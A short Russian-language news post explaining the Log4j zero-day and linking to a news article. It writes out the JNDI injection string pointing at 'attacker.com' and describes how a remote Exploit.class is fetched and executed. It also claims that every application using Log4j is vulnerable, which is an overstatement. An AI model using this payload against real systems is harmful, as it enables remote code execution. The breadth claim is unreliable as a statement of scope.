Вчерашняя обнаруженная уязвимость нулевого дня в Java-библиотеке Log4j сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой Log4j 2 отправит на сервер
attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например,
http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.
Уязвимы все приложения которые используют Log4j, в частности все выпущенные версии Minecraft, Apple, iCloud и Twitter.
https://www.sify.com/finance/serious-bug-puts-apple-icloud-twitter-minecraft-at-hacking-threat-news-technology-vmlg2Ncbhajab.html